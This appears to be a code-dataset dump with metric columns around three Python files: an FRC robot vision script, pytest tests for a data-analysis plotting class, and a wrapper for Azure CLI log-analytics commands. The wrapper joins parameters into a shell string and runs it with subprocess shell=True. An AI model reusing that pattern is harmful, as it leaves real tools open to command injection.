| 308
| 2,654
| 5.613636
| 0.13961
| 0.072874
| 0.090226
| 0.145749
| 0.943898
| 0.943898
| 0.877964
| 0.849624
| 0.818971
| 0.791209
| 0
| 0.005869
| 0.165411
| 2,654
| 115
| 68
| 23.078261
| 0.774718
| 0.004145
| 0
| 0.782609
| 0
| 0
| 0.387856
| 0.047818
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.065217
| false
| 0.086957
| 0
| 0
| 0.065217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
78540be42820e6505d9d5e688146afb6ea40ae28
| 7,698
|
py
|
Python
|
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
src/vision/ShockVision.py
|
shockwave4488/FRC-2019-Public
|
174ac97c000d915ed96ec839efb480c0ab1f11e0
|
[
"MIT"
] | null | null | null |
import libjevois as jevois
import cv2
import numpy as np
class ShockVision:
def getCenterX(goodContour):
return goodContour[1]
def process(self, inframe, outframe):
img = inframe.getCvBGR()
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lowerMask = cv2.inRange(hsv, np.array([60, 120, 240]), np.array([100, 255, 255]))
upperMask = cv2.inRange(hsv, np.array([60, 120, 240]), np.array([100, 255, 255]))
mask = cv2.bitwise_or(lowerMask, upperMask)
colorFiltered = cv2.bitwise_and(img, img, mask=upperMask)
img=colorFiltered
contours, hierarchy = cv2.findContours(cv2.split(colorFiltered)[2], cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_TC89_KCOS)
goodContours = list()
for contour in contours:
currentContour = cv2.convexHull(contour, False)
perimeter = cv2.arcLength(currentContour,True)
rect = cv2.minAreaRect(currentContour)
center = rect[0]
angle = rect[2]
width,height = rect[1]
area = width * height
apRatio=0
if (area > 0 and perimeter > 0):
apRatio = area/perimeter**2
#jevois.LINFO("per: " + str(perimeter))
#jevois.LINFO("area: " + str(area))
#jevois.LINFO(str(apRatio))
if width==0 or height==0:
continue
centerX,centerY = rect[0]
ratio = width/height
if (ratio > 0.2 and ratio < 0.8) and (angle > -30 and angle < 10 and apRatio > 0.045 and apRatio < 0.08):
box = cv2.boxPoints(rect)
box = np.int0(box)
isLeft = False
img = cv2.drawContours(img, [box], 0, (0,0,255), 3)
goodContours.append([contour, centerX, centerY, area, isLeft])
if (ratio > 1 and ratio < 4) and (angle > -90 and angle < -50 and apRatio > 0.045 and apRatio <0.08):
box = cv2.boxPoints(rect)
box = np.int0(box)
isLeft = True
img = cv2.drawContours(img, [box], 0, (255,0,0), 3)
goodContours.append([contour, centerX, centerY, area, isLeft])
goodContours.sort(key=ShockVision.getCenterX)
pair = []
if (len(goodContours)) > 0:
largestRect = goodContours[0]
indexOfLargest = 0
for i in range(0,len(goodContours)):
if goodContours[i][3] > largestRect[3]:
largestRect = goodContours[i]
indexOfLargest = i
pair = self.pairRect(goodContours, largestRect)
img = cv2.drawContours(img, pair[0], 0, (150,100,150), 3)
if len(pair) == 2:
img = cv2.drawContours(img, pair[1], 0, (150,100,150), 3)
if len(pair) == 1 or len(pair) == 2:
avgX = pair[0][1] + pair[1][1] if len(pair) == 2 else pair[0][1]
avgY = pair[0][2] + pair[1][2] if len(pair) == 2 else pair[0][2]
avgX /= len(pair)
avgY /= len(pair)
if pair[0][4] == True:
TargetAngle = "L"
else:
TargetAngle = "R"
jevois.sendSerial("&" + str(avgX) + "," + str(avgY) + "," + "B" + "," + str(area) + "," + "top" ) if len(pair) == 2 else jevois.sendSerial("&" + str(avgX) + "," + str(avgY) + "," + TargetAngle + "," + str(area) + "," + "top" )
else:
jevois.sendSerial("&None" + "," + "top")
outframe.sendCv(img)
def processNoUSB(self, inframe):
img = inframe.getCvBGR()
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lowerMask = cv2.inRange(hsv, np.array([60, 120, 240]), np.array([100, 255, 255]))
upperMask = cv2.inRange(hsv, np.array([60, 120, 240]), np.array([100, 255, 255]))
mask = cv2.bitwise_or(lowerMask, upperMask)
colorFiltered = cv2.bitwise_and(img, img, mask=upperMask)
img=colorFiltered
contours, hierarchy = cv2.findContours(cv2.split(colorFiltered)[2], cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_TC89_KCOS)
goodContours = list()
for contour in contours:
currentContour = cv2.convexHull(contour, False)
perimeter = cv2.arcLength(currentContour,True)
rect = cv2.minAreaRect(currentContour)
center = rect[0]
angle = rect[2]
width,height = rect[1]
area = width * height
apRatio=0
if (area > 0 and perimeter > 0):
apRatio = area/perimeter**2
#jevois.LINFO("per: " + str(perimeter))
#jevois.LINFO("area: " + str(area))
#jevois.LINFO(str(apRatio))
if width==0 or height==0:
continue
centerX,centerY = rect[0]
ratio = width/height
if (ratio > 0.2 and ratio < 0.8) and (angle > -30 and angle < 10 and apRatio > 0.045 and apRatio < 0.08):
box = cv2.boxPoints(rect)
box = np.int0(box)
isLeft = False
goodContours.append([contour, centerX, centerY, area, isLeft])
if (ratio > 1 and ratio < 4) and (angle > -90 and angle < -50 and apRatio > 0.045 and apRatio <0.08):
box = cv2.boxPoints(rect)
box = np.int0(box)
isLeft = True
goodContours.append([contour, centerX, centerY, area, isLeft])
goodContours.sort(key=ShockVision.getCenterX)
pair = []
if (len(goodContours)) > 0:
largestRect = goodContours[0]
indexOfLargest = 0
for i in range(0,len(goodContours)):
if goodContours[i][3] > largestRect[3]:
largestRect = goodContours[i]
indexOfLargest = i
pair = self.pairRect(goodContours, largestRect)
if len(pair) == 1 or len(pair) == 2:
avgX = pair[0][1] + pair[1][1] if len(pair) == 2 else pair[0][1]
avgY = pair[0][2] + pair[1][2] if len(pair) == 2 else pair[0][2]
avgX /= len(pair)
avgY /= len(pair)
if pair[0][4] == True:
TargetAngle = "L"
else:
TargetAngle = "R"
jevois.sendSerial("&" + str(int(round(avgX))) + "," + str(int(round(avgY))) + "," + "B" + "," + str(int(round(area))) + "," + "top" ) if len(pair) == 2 else jevois.sendSerial("&" + str(int(round(avgX))) + "," + str(int(round(avgY))) + "," + TargetAngle + "," + str(int(round(area))) + "," + "top")
else:
jevois.sendSerial("&None" + "," + "top")
def pairRect(self, goodContours, largest):
closestOpposite = None
for contour in goodContours:
if not contour[4] == largest[4]:
if largest[4]:
if closestOpposite is None:
if contour[1] > largest[1]:
closestOpposite = contour
else:
if contour[1] < closestOpposite[1] and contour[1] > largest[1]:
closestOpposite = contour
else:
if closestOpposite is None:
if contour[1] < largest[1]:
closestOpposite = contour
else:
if contour[1] > closestOpposite[1] and contour[1] < largest[1]:
closestOpposite = contour
if closestOpposite is None:
return list([largest])
return list([largest, closestOpposite])
| 47.226994
| 309
| 0.511432
| 850
| 7,698
| 4.615294
| 0.141176
| 0.026765
| 0.020647
| 0.017843
| 0.898037
| 0.879684
| 0.861331
| 0.843997
| 0.834565
| 0.834565
| 0
| 0.059822
| 0.357236
| 7,698
| 163
| 310
| 47.226994
| 0.733023
| 0.025461
| 0
| 0.816327
| 0
| 0
| 0.00747
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027211
| false
| 0
| 0.020408
| 0.006803
| 0.07483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7869ec679371f149f9583c03b5286932a3fc79ff
| 13,905
|
py
|
Python
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 6
|
2020-04-16T22:36:14.000Z
|
2020-04-25T14:34:47.000Z
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 9
|
2020-04-16T18:25:37.000Z
|
2020-05-03T17:24:36.000Z
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 1
|
2020-04-18T17:29:42.000Z
|
2020-04-18T17:29:42.000Z
|
"""Jaime Sendra Berenguer-2020.
MLearner Machine Learning Library Extensions
Author:Jaime Sendra Berenguer<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
import pytest
from mlearner.preprocessing import DataAnalyst
import matplotlib
matplotlib.use('Template')
data = pd.DataFrame({"a": [0., 1., 1., 0., 1., 1.], "b": [10, 11, 12, 13, 11, 100], "c": ["OK", "OK", "NOK", "OK", "OK", "NOK"]})
col = ["a", "b"]
"""
DATA ANALYST -- BOXPLOT
"""
def test_init_type_data():
with pytest.raises(TypeError):
DataAnalyst(np.array(data))
def test_boxplot_features_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.boxplot(features=np.array(col))
def test_boxplot_features_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=[])
def test_boxplot_features_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=["d"])
def test_boxplot_features_error_object():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=["c"], target=["a"])
def test_boxplot_feature_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.boxplot(features=["a"], target=np.array(col))
def test_boxplot_feature_error_null():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=col, target=["d"])
def test_boxplot_target_error_null2():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=col, target=[])
def test_boxplot_target_error_only():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=col, target=["a", "b"])
def test_boxplot_target_error_None():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=col)
def test_boxplot_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.boxplot(features=col, target=["c"], save_image=True, path="/invalid")
def test_boxplot_display_image():
da = DataAnalyst(data)
da.boxplot(features=["a", "b"], target=["c"], display=True)
def test_boxplot_features_none():
da = DataAnalyst(data)
da.boxplot(target=["c"], display=True)
"""
DATA ANALYST -- dISPERSION
"""
def test_dispersion_categoria_features_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.dispersion_categoria(features=np.array(col))
def test_dispersion_categoria_features_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=[])
def test_dispersion_categoria_features_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=["d"])
def test_dispersion_categoria_features_error_object():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=["c"], target=["a"])
def test_dispersion_categoria_target_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.dispersion_categoria(features=["a"], target=np.array(col))
def test_dispersion_categoria_target_error_null():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=col, target=["d"])
def test_dispersion_categoria_target_error_null2():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=col, target=[])
def test_dispersion_categoria_target_error_only():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=col, target=["a", "b"])
def test_dispersion_categoria_target_error_None():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=col)
def test_dispersion_categoria_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.dispersion_categoria(features=col, target=["c"], save_image=True, path="/incorrect")
def test_dispersion_categoria_save_image():
da = DataAnalyst(data)
da.dispersion_categoria(features=["a", "b"], target=["c"], display=True)
def test_dispersion_categoria_save_image1():
da = DataAnalyst(data)
da.dispersion_categoria(target=["c"], display=True)
"""
DATA ANALYST -- PAIRPLOT
"""
def test_sns_jointplot_feature1_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_jointplot(feature1=np.array(["a"]), feature2=["b"], target=["c"], categoria1="OK")
def test_sns_jointplot_feature1_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=[], feature2=["b"], target=["c"], categoria1="OK")
def test_sns_jointplot_feature1_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["d"], feature2=["b"], target=["c"], categoria1="OK")
def test_sns_jointplot_feature1_error_object():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["c"], feature2=["b"], target=["c"], categoria1="OK")
def test_sns_jointplot_feature2_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_jointplot(feature1=["a"], feature2=np.array(["b"]), target=["c"], categoria1="OK")
def test_sns_jointplot_feature2_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=[], target=["c"], categoria1="OK")
def test_sns_jointplot_feature2_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["d"], target=["c"], categoria1="OK")
def test_sns_jointplot_feature2_error_object():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["c"], target=["c"], categoria1="OK")
def test_sns_jointplot_target_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=np.array(["c"]), categoria1="OK")
def test_sns_jointplot_target_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=[], categoria1="OK")
def test_sns_jointplot_target_error_not_include():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["d"], categoria1="OK")
def test_sns_jointplot_target_error_none():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], categoria1="OK")
def test_sns_jointplot_categoria1_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=np.array(["OK"]))
def test_sns_jointplot_categoria1_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=[])
def test_sns_jointplot_categoria1_error_max():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK", "OK"])
def test_sns_jointplot_categoria1_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OKNOK"])
def test_sns_jointplot_categoria1_error_None():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=None)
def test_sns_jointplot_categoria2_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=np.array(["OK"]))
def test_sns_jointplot_categoria2_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=[])
def test_sns_jointplot_categoria2_error_max():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["OK", "OK"])
def test_sns_jointplot_categoria2_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["OKNOK"])
def test_sns_jointplot_categoria2_noerror_None():
da = DataAnalyst(data)
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=None)
def test_sns_jointplot_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["NOK"], save_image=True, path="/invalid")
def test_sns_jointplot_display():
da = DataAnalyst(data)
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["NOK"], display=True)
def test_sns_jointplot_test1():
da = DataAnalyst(data)
da.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"])
"""
DATA ANALYST -- PAIRPLOT
"""
def test_sns_pairplot_features_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_pairplot(features=np.array(col))
def test_sns_pairplot_features_error_empty():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=[])
def test_sns_pairplot_features_error_not_included():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=["d"])
def test_sns_pairplot_features_error_object():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=["c"], target=["a"])
def test_sns_pairplot_target_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.sns_pairplot(features=["a"], target=np.array(col))
def test_sns_pairplot_target_error_null():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=col, target=["d"])
def test_sns_pairplot_target_error_null2():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=col, target=[])
def test_sns_pairplot_target_error_only():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=col, target=["a", "b"])
def test_sns_pairplot_target_error_None():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=col)
def test_sns_pairplot_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.sns_pairplot(features=col, target=["c"], save_image=True, path="/incorrect")
def test_sns_pairplot_save_image():
da = DataAnalyst(data)
da.sns_pairplot(features=["a", "b"], target=["c"], display=True)
def test_sns_pairplot_save_image1():
da = DataAnalyst(data)
da.sns_pairplot(target=["c"], display=True)
"""
DATA ANALYST -- Distribution targets
"""
def test_distribution_targets_target_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.distribution_targets(target=np.array(col))
def test_distribution_targets_target_error_null():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.distribution_targets(target=["d"])
def test_distribution_targets_target_error_null2():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.distribution_targets(target=[])
def test_distribution_targets_target_error_only():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.distribution_targets(target=["a", "b"])
def test_distribution_targets_target_error_None():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.distribution_targets()
def test_distribution_targets_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.distribution_targets(target=["c"], save_image=True, path="/incorrect")
def test_distribution_targets_save_image():
da = DataAnalyst(data)
da.distribution_targets(target=["c"], display=True)
def test_distribution_targets_save_image1():
da = DataAnalyst(data)
da.distribution_targets(target=["c"], display=False)
"""
DATA ANALYST -- corr_matrix
"""
def test_corr_matrix_feature_error_type():
da = DataAnalyst(data)
with pytest.raises(TypeError):
da.corr_matrix(features=np.array(["a", "b"]))
def test_corr_matrix_feature_error_null():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.corr_matrix(features=["d"])
def test_corr_matrix_feature_error_null2():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.corr_matrix(features=[])
def test_corr_matrix_feature_error_only():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.corr_matrix(features=["c"])
def test_corr_matrix_feature_error_None():
da = DataAnalyst(data)
da.corr_matrix()
def test_corr_matrix_incorrect_path():
da = DataAnalyst(data)
with pytest.raises(NameError):
da.corr_matrix(features=["a", "b"], save_image=True, path="/incorrect")
def test_corr_matrix_save_image():
da = DataAnalyst(data)
da.corr_matrix(features=["a", "b"], display=True)
def test_corr_matrix_save_image1():
da = DataAnalyst(data)
da.corr_matrix(features=["a", "b"], display=False)
| 27.81
| 143
| 0.697735
| 1,749
| 13,905
| 5.297885
| 0.05546
| 0.058925
| 0.141269
| 0.138139
| 0.939456
| 0.89251
| 0.761062
| 0.721239
| 0.703
| 0.669221
| 0
| 0.011294
| 0.15311
| 13,905
| 499
| 144
| 27.865731
| 0.77556
| 0.0105
| 0
| 0.462295
| 0
| 0
| 0.020232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.255738
| false
| 0
| 0.016393
| 0
| 0.272131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78badbd66f1ab2623736fed8c7571a9527d95f98
| 5,912
|
py
|
Python
|
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(resource_group, workspace_name, location=None, tags=None, sku=None, capacity_reservation_level=None, retention_time=None, quota=None, query_access=None, ingestion_access=None, no_wait=None):
params = get_params(locals())
command = "az monitor log-analytics workspace create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, workspace_name, tags=None, capacity_reservation_level=None, retention_time=None, quota=None, query_access=None, ingestion_access=None, set=None, add=None, remove=None, force_string=None):
params = get_params(locals())
command = "az monitor log-analytics workspace update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, workspace_name, force=None, yes=None):
params = get_params(locals())
command = "az monitor log-analytics workspace delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group=None):
params = get_params(locals())
command = "az monitor log-analytics workspace list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_deleted_workspaces(resource_group=None):
params = get_params(locals())
command = "az monitor log-analytics workspace list-deleted-workspaces " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def recover(workspace_name, resource_group=None, no_wait=None):
params = get_params(locals())
command = "az monitor log-analytics workspace recover " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def get_schema(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace get-schema " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_usages(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace list-usages " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_management_groups(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace list-management-groups " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def get_shared_keys(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace get-shared-keys " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 37.417722
| 214
| 0.679804
| 722
| 5,912
| 5.48892
| 0.099723
| 0.077719
| 0.055514
| 0.058289
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0
| 0.004698
| 0.207882
| 5,912
| 157
| 215
| 37.656051
| 0.841555
| 0
| 0
| 0.834483
| 0
| 0
| 0.104871
| 0.007612
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075862
| false
| 0
| 0.013793
| 0
| 0.165517
| 0.227586
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.